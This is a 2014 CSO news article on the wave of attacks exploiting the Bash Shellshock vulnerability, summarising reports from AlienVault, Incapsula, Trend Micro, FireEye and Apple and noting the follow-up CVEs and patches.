Attacks against Shellshock continue as updated patches hit the Web

From Thursday on, several security firms reported a drastic uptick in the number of attacks that leverage the recently disclosed vulnerability in GNU Bash (CVE-2014-6271), widely known as Shellshock.

On Friday, Alien Vault labs reported that the flaw was being used by two attackers to install two different pieces of malware on the victim system. One of the malicious payloads will join the victim's system to a botnet, which based on the traffic in the IRC channel, is likely ran by a group out of Romania. The other payload fingerprints the victim's system and opens a backdoor, enabling remote access.

Security firm Incapsula reported that they've observed more than 17,000 attacks (an average of 725 attacks per hour) since Shellshock was disclosed on Wednesday.

In a blog post, the company says that more than 1,800 domains have been targeted, and the origin of these attacks are scattered between 400 IP addresses. A majority of the attacking IP addresses are assigned to systems in China and the U.S.

"What we are seeing here are hacker using existing botnets to create new ones: running automated scripts from compromised servers to add more hijacked machines to their flock. During the last 24 hours we saw several botnet shepherds using repurposed DDoS bots in an attempt to exploit Shellshock vulnerability to gain server access," Incapsula's post explained.

Researchers at Trend Micro have documented several attacks since Friday, including the botnet attack discovered by Alien Vault and Incapsula. Later in the day, they also detected a DDoS attack from servers that appear to have been compromised by Shellshock (based on the code running on them). Furthermore, Trend also disclosed that several official institutions in Brazil were being targeted by scanners that were looking for Shellshock-related openings.

"It does not seem to have any real payload or doing any real damage, however, only taking what appears to be information about the systems it's trying to infiltrate -- but in the world of cybercrime and cyber attacks, that may change soon enough. We believe that the information-gathering could be a sign of preparation for a bigger, much more damaging attack," Trend said of the scans in Brazil.

On Saturday, FireEye released details on several proof-of-concept scripts related to Shellshock, which in theory would allow an attacker to perform a number of tasks including, click fraud, establishing a reverse shell (with or without Perl), email reconnaissance, capturing the system's /etc/passwd (password) file, botnet creation (several variants), and UDP floods.

"We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it's only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise," FireEye wrote.

When the Shellshock vulnerability was disclosed on Wednesday, nearly all of the Linux / UNIX distributions released fixes that would correct the problem. However, researchers quickly determined that they were incomplete, leaving patched systems exposed to variations on the original attack vector.

This led to the publication of four additional CVE advisories (CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, and CVE-2014-6277), but administrators and system operators are encouraged to update GNU Bash with all of the latest fixes and to apply additional patches as they are released. So far, there have been three updates to GNU Bash since the problem was publicly disclosed.

Finally, Apple addressed Shellshock in a statement this weekend, noting that a "vast majority" of OS X users were not at risk because OS X systems were "safe by default and not exposed to remote exploits of [GNU Bash] unless users configure advanced UNIX services."

For those with advanced services enabled, Apple is working on an update.

Join the CSO newsletter!

Error: Please check your email address.

Tags VulnerabilitiesShellshockShellsecurityGNU BashAlien VaultExploits / vulnerabilitiesIncapsulagnu

More about AppleFireEyeLinux

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by Steve Ragan

Latest Videos

  • 150x50

    CSO Webinar: Will your data protection strategy be enough when disaster strikes?

    Speakers: - Paul O’Connor, Engagement leader - Performance Audit Group, Victorian Auditor-General’s Office (VAGO) - Nigel Phair, Managing Director, Centre for Internet Safety - Joshua Stenhouse, Technical Evangelist, Zerto - Anthony Caruana, CSO MC & Moderator

    Play Video

  • 150x50

    CSO Webinar: The Human Factor - Your people are your biggest security weakness

    ​Speakers: David Lacey, Researcher and former CISO Royal Mail David Turner - Global Risk Management Expert Mark Guntrip - Group Manager, Email Protection, Proofpoint

    Play Video

  • 150x50

    CSO Webinar: Current ransomware defences are failing – but machine learning can drive a more proactive solution

    Speakers • Ty Miller, Director, Threat Intelligence • Mark Gregory, Leader, Network Engineering Research Group, RMIT • Jeff Lanza, Retired FBI Agent (USA) • Andy Solterbeck, VP Asia Pacific, Cylance • David Braue, CSO MC/Moderator What to expect: ​Hear from industry experts on the local and global ransomware threat landscape. Explore a new approach to dealing with ransomware using machine-learning techniques and by thinking about the problem in a fundamentally different way. Apply techniques for gathering insight into ransomware behaviour and find out what elements must go into a truly effective ransomware defence. Get a first-hand look at how ransomware actually works in practice, and how machine-learning techniques can pick up on its activities long before your employees do.

    Play Video

  • 150x50

    CSO Webinar: Get real about metadata to avoid a false sense of security

    Speakers: • Anthony Caruana – CSO MC and moderator • Ian Farquhar, Worldwide Virtual Security Team Lead, Gigamon • John Lindsay, Former CTO, iiNet • Skeeve Stevens, Futurist, Future Sumo • David Vaile - Vice chair of APF, Co-Convenor of the Cyberspace Law And Policy Community, UNSW Law Faculty This webinar covers: - A 101 on metadata - what it is and how to use it - Insight into a typical attack, what happens and what we would find when looking into the metadata - How to collect metadata, use this to detect attacks and get greater insight into how you can use this to protect your organisation - Learn how much raw data and metadata to retain and how long for - Get a reality check on how you're using your metadata and if this is enough to secure your organisation

    Play Video

  • 150x50

    CSO Webinar: How banking trojans work and how you can stop them

    CSO Webinar: How banking trojans work and how you can stop them Featuring: • John Baird, Director of Global Technology Production, Deutsche Bank • Samantha Macleod, GM Cyber Security, ME Bank • Sherrod DeGrippo, Director of Emerging Threats, Proofpoint (USA)

    Play Video

More videos

Blog Posts

Market Place